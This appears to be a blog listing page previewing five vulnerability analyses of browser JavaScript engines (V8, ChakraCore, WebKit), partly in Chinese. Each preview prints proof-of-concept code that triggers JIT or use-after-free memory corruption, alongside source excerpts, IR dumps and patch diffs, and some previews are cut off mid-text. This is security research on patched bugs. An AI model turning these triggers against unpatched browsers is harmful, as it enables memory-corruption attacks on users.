Posts

CVE-2017-5121 Escape Analysis

CVE-2017-5121 Escape Analysis PoC var func0 = function(f) { var o = { a: {}, b: { ba: {baa: 0, bab :[]}, bb: {}, bc: {bca: {bcaa: 0, bcab: 0, bcac: this}}, } }; o.b.bc.bca.bcab = 0; o.b.bb.bba = Object.toString(o.b.ba.bab); }; function g(){ while(true) func0(); } g(); Escape Analysis in V8 Analyze Source of Fields of Allocates: Traverse the IR graph(along Effect edge) to get the source of fields of Allocate void EscapeAnalysis::RunObjectAnalysis() { virtual_states_.resize(graph()->NodeCount()); ZoneDeque<Node*> queue(zone()); queue.push_back(graph()->start()); ZoneVector<Node*> danglers(zone()); while (!queue.empty()) { Node* node = queue.back(); queue.pop_back(); status_analysis_->SetInQueue(node->id(), false); if (Process(node)) { for (Edge edge : node->use_edges()) { Node* use = edge.from(); if (status_

CVE-2018-0777 Code Motion

CVE-2018-0777 Code Motion PoC function opt(arr, start, end) { for (let i = start; i < end; i++) { if (i === 10) { i += 0; // <<-- (a) } arr[i] = 2.3023e-320; } } function main() { let arr = new Array(100); arr.fill(1.1); for (let i = 0; i < 1000; i++) opt(arr, 0, 3); opt(arr, 0, 100000); } main(); //https://github.com/Microsoft/ChakraCore/commit/14c752b66f43ee6ecc8dd2f7f9d5378f6a91638e IR 这是 lower 之后的部分 IR: Line 6: arr[i] = 2.3023e-320; Col 9: ^ StatementBoundary #4 #001d GLOBOPT INSTR: BoundCheck 0 <= s18(s9).i32 #001d Bailout: #001d (BailOutOnArrayAccessHelperCall) TEST s18(s9).i32, s18(s9).i32 # JNSB $L18 # $L19: [helper]

CVE-2018-0776 Stack-to-Heap

CVE-2018-0776 Stack-to-Heap CVE-2018-0776 Credit to lokihardt function inlinee() { return inlinee.arguments[0]; } function opt(convert_to_var_array) { /* To make the in-place type conversion happen, it requires to segment. */ let stack_arr = []; // JavascriptNativeFloatArray stack_arr[10000] = 1.1; stack_arr[20000] = 2.2; let heap_arr = inlinee(stack_arr); convert_to_var_array(heap_arr); stack_arr[10000] = 2.3023e-320; return heap_arr[10000]; } function main() { for (let i = 0; i < 10000; i++) { opt(new Function('')); // Prevents to be inlined } print(opt(heap_arr => { heap_arr[10000] = {}; // ConvertToVarArray })); } main(); //https://github.com/Microsoft/ChakraCore/commit/40e45fc38189cc021267c65d42ca2fb5f899f9de Feature 1: Inlining 2 个栈帧折叠为 1 个栈帧 省去将 Inlinee 参数压栈的过程 某些情况下, 需要将折叠的栈帧还原回来, 例如 Bailout Feature 2: Stack Object 分配到栈上的代码: bool Lowerer::GenerateRecyclerOrMarkT

Three UaFs when iterating through HTMLFormElement::associatedElements

First of all, lets look at CVE-2017-2460. It was reported in 2017-Jan-19. PoC: ================================================================= <script> function go() {   object.name = "foo";   input.autofocus = true;   output.appendChild(input);   form.submit(); } function eventhandler() {   for(var i=0;i<100;i++) {     var e = document.createElement("input");     form.appendChild(e);   } } </script> <body onload=go()> <form id="form"> <object id="object"> <output id="output">a</output> <input id="input" onfocus="eventhandler()"> ================================================================= Patch: @@ -506,7 +506,9 @@ bool HTMLObjectElement::appendFormData(FormDataList& encoding, bool)       if (name().isEmpty())           return false;  -    Widget* widget = pluginWidget();  +    // Use PluginLoadingPolicy::DoNotLoad here or

CVE-2017-13792: UaF in WebCore::InputType::element

Image
PoC: ================================================================= <script> function go() { input.selectionDirection = "foo"; } var i=0; function eventhandler() { i++; if(i==1) { input.setAttribute("autofocus", "autofocus"); div.appendChild(form); } if(i==2) { input.type = "image/x-unsupported"; } } </script> <body onload=go()> <div id="div"> <form id="form"> <input id="input" onfocus="eventhandler()" type="tel"> ================================================================= diff: ================================================================= - if (event.isMouseEvent() - || event.type() == eventNames().blurEvent - || event.type() == eventNames().focusEvent) - { - element().document().updateStyleIfNeeded(); - - auto* renderer = element().renderer(); - if (element().renderer